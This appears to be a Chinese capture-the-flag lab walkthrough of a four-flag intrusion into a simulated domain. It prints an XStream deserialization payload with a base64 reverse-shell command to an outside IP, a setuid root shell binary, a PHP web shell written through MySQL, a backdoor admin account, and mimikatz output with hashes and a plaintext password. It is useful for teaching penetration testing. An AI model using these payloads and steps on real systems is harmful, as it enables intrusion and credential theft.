1. FLAG01
2. FLAG02
3. FLAG03
4. FLAG04

FLAG01

先用 fscan 进行一波信息搜集

┌──(root㉿kali)-[~/Desktop/tmp]
└─# ../pentest/fscan/fscan2 -h 39.99.157.149
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     _ __  __ _ _ __ __ _  _ __| | __    │
│  / /_\/____/ _ _|/ _ _| '_ _/ _` |/ __| |/ /    │
│ / /_\\_ ____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \_ _,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-27 03:44:50] [INFO] 暴力破解线程数: 1
[2025-04-27 03:44:50] [INFO] 开始信息扫描
[2025-04-27 03:44:50] [INFO] 最终有效主机数量: 1
[2025-04-27 03:44:51] [INFO] 开始主机扫描
[2025-04-27 03:44:51] [INFO] 有效端口数量: 233
[2025-04-27 03:44:51] [SUCCESS] 端口开放 39.99.157.149:22
[2025-04-27 03:44:51] [SUCCESS] 端口开放 39.99.157.149:80
[2025-04-27 03:44:51] [SUCCESS] 端口开放 39.99.157.149:21
[2025-04-27 03:44:51] [SUCCESS] 服务识别 39.99.157.149:22 => [ssh] 版本: 8.2p1 Ubuntu 4ubuntu0.5 产品: OpenSSH 系统: Linux 信息: Ubuntu Linux; protocol 2.0 Banner: [SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-27 03:44:51] [SUCCESS] 服务识别 39.99.157.149:21 => [ftp] 版本: 3.0.3 产品: vsftpd 系统: Unix Banner: [220 (vsFTPd 3.0.3).]
[2025-04-27 03:44:53] [SUCCESS] 端口开放 39.99.157.149:8080
[2025-04-27 03:44:56] [SUCCESS] 服务识别 39.99.157.149:80 => [http]
[2025-04-27 03:44:59] [SUCCESS] 服务识别 39.99.157.149:8080 => [http]
[2025-04-27 03:45:00] [INFO] 存活端口数量: 4
[2025-04-27 03:45:00] [INFO] 开始漏洞扫描
[2025-04-27 03:45:00] [INFO] 加载的插件: ftp, ssh, webpoc, webtitle
[2025-04-27 03:45:01] [SUCCESS] 网站标题 http://39.99.157.149      状态码: 200 长度: 10918  标题: Apache2 Ubuntu Default Page: It works
[2025-04-27 03:45:02] [SUCCESS] 匿名登录成功!
[2025-04-27 03:45:02] [SUCCESS] 网站标题 http://39.99.157.149:8080 状态码: 200 长度: 3655   标题: 公司发货单
[2025-04-27 03:45:08] [SUCCESS] 扫描已完成: 6/6

ftp 可以匿名登陆，登录之后可以下载一个 pom.xml

<?xml version="1.0" encoding="UTF-8"?>
< project xmlns = "http://maven.apache.org/POM/4.0.0" xmlns: xsi = "http://www.w3.org/2001/XMLSchema-instance"
         xsi: schemaLocation = "http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd" >
    <modelVersion> 4.0.0 </modelVersion>
    <parent>
        <groupId> org.springframework.boot </groupId>
        <artifactId> spring-boot-starter-parent </artifactId>
        <version> 2.7.2 </version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>
    <groupId> com.example </groupId>
    <artifactId> ezjava </artifactId>
    <version> 0.0.1-SNAPSHOT </version>
    <name> ezjava </name>
    <description> ezjava </description>
    <properties>
        <java.version> 1.8 </java.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId> org.springframework.boot </groupId>
            <artifactId> spring-boot-starter-thymeleaf </artifactId>
        </dependency>
        <dependency>
            <groupId> org.springframework.boot </groupId>
            <artifactId> spring-boot-starter-web </artifactId>
        </dependency>

        <dependency>
            <groupId> org.springframework.boot </groupId>
            <artifactId> spring-boot-starter-test </artifactId>
            <scope> test </scope>
        </dependency>

        <dependency>
            <groupId> com.thoughtworks.xstream </groupId>
            <artifactId> xstream </artifactId>
            <version> 1.4.16 </version>
        </dependency>

        <dependency>
            <groupId> commons-collections </groupId>
            <artifactId> commons-collections </artifactId>
            <version> 3.2.1 </version>
        </dependency>
    </dependencies>

    <build>
        <plugins>
            <plugin>
                <groupId> org.springframework.boot </groupId>
                <artifactId> spring-boot-maven-plugin </artifactId>
            </plugin>
        </plugins>
    </build>

</project>

存在有危险的依赖

<dependency>
           <groupId> com.thoughtworks.xstream </groupId>
           <artifactId> xstream </artifactId>
           <version> 1.4.16 </version>
       </dependency>

       <dependency>
           <groupId> commons-collections </groupId>
           <artifactId> commons-collections </artifactId>
           <version> 3.2.1 </version>
       </dependency>

存在 CVE-2021-29505 用 ysoserial 进行反弹 shell

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 " bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDYuNzUuNzAuMjAyLzQ0NDQgMD4mMQ ==}|{base64,-d}|{bash,-i}"

在 8080 端口抓包替换成 payload

<java.util.PriorityQueue serialization='custom'>
    <unserializable-parents/>
    <java.util.PriorityQueue>
        <default>
            <size> 2 </size>
        </default>
        <int> 3 </int>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type> 12345 </type>
            <value class='com.sun.org.apache.xpath.internal.objects.XString'>
                <m__obj class='string'> com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content </m__obj>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type> 12345 </type>
            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                    <parsedMessage> true </parsedMessage>
                    <soapVersion> SOAP_11 </soapVersion>
                    <bodyParts/>
                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                        <attachmentsInitialized> false </attachmentsInitialized>
                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                                    <names>
                                        <string> aa </string>
                                        <string> aa </string>
                                    </names>
                                    <ctx>
                                        <environment/>
                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                                            <java.rmi.server.RemoteObject>
                                                <string> UnicastRef </string>
                                                <string> 106.75.70.202 </string>
                                                <int> 1099 </int>
                                                <long> 0 </long>
                                                <int> 0 </int>
                                                <long> 0 </long>
                                                <short> 0 </short>
                                                <boolean> false </boolean>
                                            </java.rmi.server.RemoteObject>
                                        </registry>
                                        <host> 106.75.70.202 </host>
                                        <port> 1099 </port>
                                    </ctx>
                                </candidates>
                            </aliases>
                        </nullIter>
                    </sm>
                </message>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
    </java.util.PriorityQueue>
</java.util.PriorityQueue>

发包之后 shell 就弹出来了，然后写个公钥进去，flag1 在/root/flag 下

FLAG02

上传一个 fscan 扫描内网，再搭建一个代理

root@ubuntu:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 :: 1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e: 09:09:4b brd ff: ff: ff: ff: ff: ff
    inet 172.22.13.14/16 brd 172.22.255.255 scope global dynamic eth0
       valid_lft 315359007sec preferred_lft 315359007sec
    inet6 fe80:: 216:3eff: fe09:94b/64 scope link
       valid_lft forever preferred_lft forever
root@ubuntu:~# ./f
flag/   fscan2
root@ubuntu:~# ./fscan2 -h 172.22.13.14/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     _ __  __ _ _ __ __ _  _ __| | __    │
│  / /_\/____/ _ _|/ _ _| '_ _/ _` |/ __| |/ /    │
│ / /_\\_ ____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \_ _,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-27 15:59:52] [INFO] 暴力破解线程数: 1
[2025-04-27 15:59:52] [INFO] 开始信息扫描
[2025-04-27 15:59:52] [INFO] CIDR 范围: 172.22.13.0-172.22.13.255
[2025-04-27 15:59:52] [INFO] 生成 IP 范围: 172.22.13.0.%! d(string = 172.22.13.255) - %! s(MISSING).%! d(MISSING)
[2025-04-27 15:59:52] [INFO] 解析 CIDR 172.22.13.14/24 -> IP 范围 172.22.13.0-172.22.13.255
[2025-04-27 15:59:52] [INFO] 最终有效主机数量: 256
[2025-04-27 15:59:52] [INFO] 开始主机扫描
[2025-04-27 15:59:52] [SUCCESS] 目标 172.22.13.14    存活 (ICMP)
[2025-04-27 15:59:52] [SUCCESS] 目标 172.22.13.6     存活 (ICMP)
[2025-04-27 15:59:52] [SUCCESS] 目标 172.22.13.57    存活 (ICMP)
[2025-04-27 15:59:52] [SUCCESS] 目标 172.22.13.28    存活 (ICMP)
[2025-04-27 15:59:55] [INFO] 存活主机数量: 4
[2025-04-27 15:59:55] [INFO] 有效端口数量: 233
[2025-04-27 15:59:55] [SUCCESS] 端口开放 172.22.13.57:22
[2025-04-27 15:59:55] [SUCCESS] 端口开放 172.22.13.14:22
[2025-04-27 15:59:55] [SUCCESS] 端口开放 172.22.13.14:21
[2025-04-27 15:59:55] [SUCCESS] 端口开放 172.22.13.28:80
[2025-04-27 15:59:55] [SUCCESS] 端口开放 172.22.13.57:80
[2025-04-27 15:59:55] [SUCCESS] 端口开放 172.22.13.28:135
[2025-04-27 15:59:55] [SUCCESS] 端口开放 172.22.13.14:80
[2025-04-27 15:59:55] [SUCCESS] 端口开放 172.22.13.6:135
[2025-04-27 15:59:55] [SUCCESS] 端口开放 172.22.13.6:445
[2025-04-27 15:59:55] [SUCCESS] 端口开放 172.22.13.6:88
[2025-04-27 15:59:55] [SUCCESS] 端口开放 172.22.13.6:389
[2025-04-27 15:59:55] [SUCCESS] 端口开放 172.22.13.28:139
[2025-04-27 15:59:55] [SUCCESS] 端口开放 172.22.13.6:139
[2025-04-27 15:59:55] [SUCCESS] 端口开放 172.22.13.28:445
[2025-04-27 15:59:55] [SUCCESS] 端口开放 172.22.13.28:3306
[2025-04-27 15:59:55] [SUCCESS] 端口开放 172.22.13.28:8000
[2025-04-27 15:59:55] [SUCCESS] 端口开放 172.22.13.14:8080
[2025-04-27 15:59:55] [SUCCESS] 服务识别 172.22.13.57:22 => [ssh] 版本: 7.4 产品: OpenSSH 信息: protocol 2.0 Banner: [SSH-2.0-OpenSSH_7.4.]
[2025-04-27 15:59:56] [SUCCESS] 服务识别 172.22.13.14:22 => [ssh] 版本: 8.2p1 Ubuntu 4ubuntu0.5 产品: OpenSSH 系统: Linux  信息: Ubuntu Linux; protocol 2.0 Banner: [SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-27 15:59:56] [SUCCESS] 服务识别 172.22.13.14:21 => [ftp] 版本: 3.0.3 产品: vsftpd 系统: Unix Banner: [220 (vsFTPd 3.0.3).]
[2025-04-27 16:00:01] [SUCCESS] 服务识别 172.22.13.57:80 => [http] 版本: 1.20.1 产品: nginx
[2025-04-27 16:00:01] [SUCCESS] 服务识别 172.22.13.6:445 =>
[2025-04-27 16:00:01] [SUCCESS] 服务识别 172.22.13.6:88 =>
[2025-04-27 16:00:01] [SUCCESS] 服务识别 172.22.13.28:80 => [http]
[2025-04-27 16:00:01] [SUCCESS] 服务识别 172.22.13.28:139 =>  Banner: [.]
[2025-04-27 16:00:01] [SUCCESS] 服务识别 172.22.13.6:389 =>
[2025-04-27 16:00:01] [SUCCESS] 服务识别 172.22.13.6:139 =>  Banner: [.]
[2025-04-27 16:00:01] [SUCCESS] 服务识别 172.22.13.28:445 =>
[2025-04-27 16:00:01] [SUCCESS] 服务识别 172.22.13.28:8000 =>
[2025-04-27 16:00:02] [SUCCESS] 服务识别 172.22.13.14:8080 => [http]
[2025-04-27 16:00:02] [SUCCESS] 服务识别 172.22.13.14:80 => [http]
[2025-04-27 16:00:09] [SUCCESS] 服务识别 172.22.13.28:3306 =>  Banner: [!.#08S01Got packets out of order]
[2025-04-27 16:01:01] [SUCCESS] 服务识别 172.22.13.28:135 =>
[2025-04-27 16:01:01] [SUCCESS] 服务识别 172.22.13.6:135 =>
[2025-04-27 16:01:01] [INFO] 存活端口数量: 17
[2025-04-27 16:01:01] [INFO] 开始漏洞扫描
[2025-04-27 16:01:01] [INFO] 加载的插件: findnet, ftp, ldap, ms17010, mysql, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-27 16:01:01] [SUCCESS] 网站标题 http://172.22.13.57       状态码: 200 长度: 4833   标题: Welcome to CentOS
[2025-04-27 16:01:01] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.13.6
主机名: WIN-DC
发现的网络接口:
   IPv4 地址:
      └─ 172.22.13.6
[2025-04-27 16:01:01] [SUCCESS] 网站标题 http://172.22.13.28       状态码: 200 长度: 2525   标题: 欢迎登录 OA 办公平台
[2025-04-27 16:01:01] [SUCCESS] 匿名登录成功!
[2025-04-27 16:01:01] [SUCCESS] NetBios 172.22.13.6     DC: XIAORANG\WIN-DC
[2025-04-27 16:01:01] [SUCCESS] 网站标题 http://172.22.13.14       状态码: 200 长度: 10918  标题: Apache2 Ubuntu Default Page: It works
[2025-04-27 16:01:01] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.13.28
主机名: WIN-HAUWOLAO
发现的网络接口:
   IPv4 地址:
      └─ 172.22.13.28
[2025-04-27 16:01:01] [SUCCESS] NetBios 172.22.13.28    WIN-HAUWOLAO.xiaorang.lab           Windows Server 2016 Datacenter 14393
[2025-04-27 16:01:01] [SUCCESS] 网站标题 http://172.22.13.14:8080  状态码: 200 长度: 3655   标题: 公司发货单
[2025-04-27 16:01:01] [SUCCESS] 网站标题 http://172.22.13.28:8000  状态码: 200 长度: 170    标题: Nothing Here.

题目提示了要打 NFS，先扫一下 2049 的端口

root@ubuntu:~# ./fscan2 -h 172.22.13.14/24 -p 2049
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     _ __  __ _ _ __ __ _  _ __| | __    │
│  / /_\/____/ _ _|/ _ _| '_ _/ _` |/ __| |/ /    │
│ / /_\\_ ____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \_ _,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-27 16:07:15] [INFO] 暴力破解线程数: 1
[2025-04-27 16:07:15] [INFO] 开始信息扫描
[2025-04-27 16:07:15] [INFO] CIDR 范围: 172.22.13.0-172.22.13.255
[2025-04-27 16:07:15] [INFO] 生成 IP 范围: 172.22.13.0.%! d(string = 172.22.13.255) - %! s(MISSING).%! d(MISSING)
[2025-04-27 16:07:16] [INFO] 解析 CIDR 172.22.13.14/24 -> IP 范围 172.22.13.0-172.22.13.255
[2025-04-27 16:07:16] [INFO] 最终有效主机数量: 256
[2025-04-27 16:07:16] [INFO] 开始主机扫描
[2025-04-27 16:07:16] [SUCCESS] 目标 172.22.13.6     存活 (ICMP)
[2025-04-27 16:07:16] [SUCCESS] 目标 172.22.13.14    存活 (ICMP)
[2025-04-27 16:07:16] [SUCCESS] 目标 172.22.13.28    存活 (ICMP)
[2025-04-27 16:07:16] [SUCCESS] 目标 172.22.13.57    存活 (ICMP)
[2025-04-27 16:07:19] [INFO] 存活主机数量: 4
[2025-04-27 16:07:19] [INFO] 有效端口数量: 1
[2025-04-27 16:07:19] [SUCCESS] 端口开放 172.22.13.57:2049

172.22.13.57 开了 2049 的端口

#在靶机上操作
root@ubuntu:~# showmount -e 172.22.13.57
Export list for 172.22.13.57:
/home/joyce *
root@ubuntu:~# cd /tmp
root@ubuntu:/tmp# mkdir test
root@ubuntu:/tmp# mount -t nfs 172.22.13.57:/ ./test -o nolock

然后 joyce 的家目录就被成功挂载了，写一个公钥进去

1
2
3

root@ubuntu:/tmp/test/home/joyce# mkdir .ssh
root@ubuntu:/tmp/test/home/joyce# cd .ssh
root@ubuntu:/tmp/test/home/joyce/.ssh# echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJcatU49PfwyMAfrfJcaaIFCNOJNWOdDonEg3ahNxG8H root@kali'> authorized_keys

然后 ssh 连接

┌──(root㉿kali)-[~/Desktop/tmp/123]
└─# proxy -f proxychains4.conf ssh joyce@172.22.13.57
[proxychains] config file found: proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  192.168.11.1:9999  ...  172.22.13.57:22  ...  OK
The authenticity of host '172.22.13.57 (172.22.13.57)' can't be established.
ED25519 key fingerprint is SHA256: Y8qbRlvlJKReDyk1mEsy/A7aQosNyeucM/GZs7aI8SA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.22.13.57' (ED25519) to the list of known hosts.
Last login: Thu Aug 11 18:16:01 2022

Welcome to Alibaba Cloud Elastic Compute Service !

[joyce@centos ~]$ ls
[joyce@centos ~]$ ls -al
total 28
drwx------  3 joyce joyce 4096 Apr 27 16:11 .
drwxr-xr-x. 4 root  root  4096 Aug 10  2022 ..
-rw-------  1 joyce joyce    5 Aug 11  2022 .bash_history
-rw-r--r--  1 joyce joyce   18 Nov 25  2021 .bash_logout
-rw-r--r--  1 joyce joyce  193 Nov 25  2021 .bash_profile
-rw-r--r--  1 joyce joyce  231 Nov 25  2021 .bashrc
drwxr-xr-x  2 root  root  4096 Apr 27 16:12 .ssh
[joyce@centos ~]$

尝试提权，查找 suid 权限

[joyce@centos ~]$ find / -perm -u = s 2 >/dev/null
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/sbin/unix_chkpwd
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/sbin/mount.nfs
/usr/bin/sudo
/usr/bin/chage
/usr/bin/at
/usr/bin/mount
/usr/bin/crontab
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/ftp
/usr/bin/umount
/usr/lib/polkit-1/polkit-agent-helper-1

ftp 提权可以读文件，也可以通过 nfs 上传一个恶意文件拿到 shell

root@ubuntu:/tmp# echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > root.c
root@ubuntu:/tmp# gcc root.c -o root
root.c: In function ‘main’:
root.c: 1:14: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
    1 | int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }
      |              ^~~~~~
root.c: 1:25: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
    1 | int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }
      |                         ^~~~~~
root.c: 1:36: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
    1 | int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }
      |
root@ubuntu:/tmp# chmod +s ./root
root@ubuntu:/tmp# mv root ./test/home/joyce/

[joyce@centos ~]$ ls
root
[joyce@centos ~]$ ./root
[root@centos ~]# id
uid = 0(root) gid = 0(root) groups = 0(root),994(joyce)

flag02 在根目录下

FLAG03

172.22.13.28 是一个 OA 系统，用 fscan 扫一下全端口，可以扫到 mysql 有弱口令

1	root: 123456

navicat 连接

mysql > show variables like "secure_file_priv";
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
1 row in set (0.05 sec)
mysql > show variables like "%general%";
+------------------+--------------------------------------------------------------+
| Variable_name    | Value                                                        |
+------------------+--------------------------------------------------------------+
| general_log      | OFF                                                          |
| general_log_file | C:\phpstudy_pro\Extensions\MySQL5.7.26\data\WIN-HAUWOLAO.log |
+------------------+--------------------------------------------------------------+
2 rows in set (0.06 sec)

尝试写马

1 2	mysql > select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php"; Query OK, 1 row affected (0.03 sec)

然后蚁剑连接，flag03 在 C:/Users/Administrator/flag/下

FLAG04

创建一个用户，添加进用户组里

C:\Users\Administrator\flag > net user lv Asd123123 /add
命令成功完成。
 
C:\Users\Administrator\flag > net localgroup administrators lv /add
命令成功完成。

然后远程桌面连接，上传一个 mimikatz 抓取哈希


  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # privilege:: debug
Privilege '20' OK

mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # sekurlsa:: logonpasswords

Authentication Id : 0 ; 11159151 (00000000:00aa466f)
Session           : RemoteInteractive from 2
User Name         : lv
Domain            : WIN-HAUWOLAO
Logon Server      : WIN-HAUWOLAO
Logon Time        : 2025/4/27 16:53:43
SID               : S-1-5-21-2057596273-973658165-3030246172-1000
        msv :
         [00000003] Primary
         * Username : lv
         * Domain   : WIN-HAUWOLAO
         * NTLM     : 85edf6aacad2ac8e2a7a44741eb0b236
         * SHA1     : aab02ea07aee541e9f60a1f6d5a54a2045965743
        tspkg :
        wdigest :
         * Username : lv
         * Domain   : WIN-HAUWOLAO
         * Password : (null)
        kerberos :
         * Username : lv
         * Domain   : WIN-HAUWOLAO
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 11136230 (00000000:00a9ece6)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/4/27 16:53:43
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * NTLM     : 00f24a2e0e0076b23f55b10e54d4cc25
         * SHA1     : 8c03f31f89359af762fe0f271a0d61a64ef6eca1
        tspkg :
        wdigest :
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN-HAUWOLAO$
         * Domain   : xiaorang.lab
         * Password : 18 81 7a 3c 1c ec 03 ec 71 bd fd a6 5f c7 1d d8 be 20 8f e4 e2 f2 96 d1 01 1a 88 7f 4c 07 89 bd 00 45 80 3d b0 61 e5 73 be e2 b4 01 9b 14 88 64 e7 ad 83 83 65 0a 53 40 9f 44 a9 90 b2 aa 04 c7 e1 23 f5 dd 3e f4 5d b3 13 88 9e 67 1f 0a 8a 18 5f dd 82 d2 f0 e1 41 5d 12 6f 8f bb 44 05 66 8d 10 40 e2 5d 97 c8 48 ea 5d 74 d8 7b 5b 1a 5f 9e 94 3a 21 01 c7 9f a5 c9 79 3c 70 91 4c 52 4e 69 ce f6 fe 0f db 54 2a 7c 3c 3a 71 99 2a a9 3e 3d 4e 06 b1 b7 8d 11 a7 7b 71 5a 7d 8c f3 cb 2b f7 c0 eb 74 64 e7 c7 f0 32 36 d0 03 1f f2 69 25 52 5f 18 05 0e 66 1f 82 b4 a7 99 11 c7 64 b5 78 05 c1 91 94 f7 16 8c d0 04 7e 0f e3 2b 7c 83 af 3d d9 46 fd da d8 cd 5c af 89 cd 93 78 14 68 f5 e4 71 55 0f a1 7d c6 9e f6 7f 0c 5d 62 f6 33 5b 12
        ssp :
        credman :

Authentication Id : 0 ; 11136190 (00000000:00a9ecbe)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/4/27 16:53:43
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * NTLM     : 00f24a2e0e0076b23f55b10e54d4cc25
         * SHA1     : 8c03f31f89359af762fe0f271a0d61a64ef6eca1
        tspkg :
        wdigest :
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN-HAUWOLAO$
         * Domain   : xiaorang.lab
         * Password : 18 81 7a 3c 1c ec 03 ec 71 bd fd a6 5f c7 1d d8 be 20 8f e4 e2 f2 96 d1 01 1a 88 7f 4c 07 89 bd 00 45 80 3d b0 61 e5 73 be e2 b4 01 9b 14 88 64 e7 ad 83 83 65 0a 53 40 9f 44 a9 90 b2 aa 04 c7 e1 23 f5 dd 3e f4 5d b3 13 88 9e 67 1f 0a 8a 18 5f dd 82 d2 f0 e1 41 5d 12 6f 8f bb 44 05 66 8d 10 40 e2 5d 97 c8 48 ea 5d 74 d8 7b 5b 1a 5f 9e 94 3a 21 01 c7 9f a5 c9 79 3c 70 91 4c 52 4e 69 ce f6 fe 0f db 54 2a 7c 3c 3a 71 99 2a a9 3e 3d 4e 06 b1 b7 8d 11 a7 7b 71 5a 7d 8c f3 cb 2b f7 c0 eb 74 64 e7 c7 f0 32 36 d0 03 1f f2 69 25 52 5f 18 05 0e 66 1f 82 b4 a7 99 11 c7 64 b5 78 05 c1 91 94 f7 16 8c d0 04 7e 0f e3 2b 7c 83 af 3d d9 46 fd da d8 cd 5c af 89 cd 93 78 14 68 f5 e4 71 55 0f a1 7d c6 9e f6 7f 0c 5d 62 f6 33 5b 12
        ssp :
        credman :

Authentication Id : 0 ; 91296 (00000000:000164a0)
Session           : Service from 0
User Name         : chenglei
Domain            : XIAORANG
Logon Server      : WIN-DC
Logon Time        : 2025/4/27 15:43:55
SID               : S-1-5-21-3269458654-3569381900-10559451-1105
        msv :
         [00000003] Primary
         * Username : chenglei
         * Domain   : XIAORANG
         * NTLM     : 0c00801c30594a1b8eaa889d237c5382
         * SHA1     : e8848f8a454e08957ec9814b9709129b7101fad7
         * DPAPI    : 89b179dc738db098372c365602b7b0f4
        tspkg :
        wdigest :
         * Username : chenglei
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : chenglei
         * Domain   : XIAORANG.LAB
         * Password : Xt61f3LBhg1
        ssp :
        credman :

Authentication Id : 0 ; 53263 (00000000:0000d00f)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/4/27 15:43:53
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * NTLM     : b5cd3591a58e1169186bcdbfd4b6322d
         * SHA1     : 226ee6b5e527e5903988f08993a2456e3297ee1f
        tspkg :
        wdigest :
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN-HAUWOLAO$
         * Domain   : xiaorang.lab
         * Password : `k+hcEDFvtzoObj=>DvzxiNqwyEn;Eu-\zFVAh>.G0u%BqQ21FskHtJlW4)3is3V;7Iu)3B00kd1##IB'LLG6wSx6TR%m;` Nfr;; Hf8O'Szfl0Z = w+^,> 0jR
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-HAUWOLAO$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/4/27 15:43:53
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * NTLM     : 00f24a2e0e0076b23f55b10e54d4cc25
         * SHA1     : 8c03f31f89359af762fe0f271a0d61a64ef6eca1
        tspkg :
        wdigest :
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : win-hauwolao$
         * Domain   : XIAORANG.LAB
         * Password : 18 81 7a 3c 1c ec 03 ec 71 bd fd a6 5f c7 1d d8 be 20 8f e4 e2 f2 96 d1 01 1a 88 7f 4c 07 89 bd 00 45 80 3d b0 61 e5 73 be e2 b4 01 9b 14 88 64 e7 ad 83 83 65 0a 53 40 9f 44 a9 90 b2 aa 04 c7 e1 23 f5 dd 3e f4 5d b3 13 88 9e 67 1f 0a 8a 18 5f dd 82 d2 f0 e1 41 5d 12 6f 8f bb 44 05 66 8d 10 40 e2 5d 97 c8 48 ea 5d 74 d8 7b 5b 1a 5f 9e 94 3a 21 01 c7 9f a5 c9 79 3c 70 91 4c 52 4e 69 ce f6 fe 0f db 54 2a 7c 3c 3a 71 99 2a a9 3e 3d 4e 06 b1 b7 8d 11 a7 7b 71 5a 7d 8c f3 cb 2b f7 c0 eb 74 64 e7 c7 f0 32 36 d0 03 1f f2 69 25 52 5f 18 05 0e 66 1f 82 b4 a7 99 11 c7 64 b5 78 05 c1 91 94 f7 16 8c d0 04 7e 0f e3 2b 7c 83 af 3d d9 46 fd da d8 cd 5c af 89 cd 93 78 14 68 f5 e4 71 55 0f a1 7d c6 9e f6 7f 0c 5d 62 f6 33 5b 12
        ssp :
        credman :

Authentication Id : 0 ; 24185 (00000000:00005e79)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/4/27 15:43:52
SID               :
        msv :
         [00000003] Primary
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * NTLM     : 00f24a2e0e0076b23f55b10e54d4cc25
         * SHA1     : 8c03f31f89359af762fe0f271a0d61a64ef6eca1
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 11159180 (00000000:00aa468c)
Session           : RemoteInteractive from 2
User Name         : lv
Domain            : WIN-HAUWOLAO
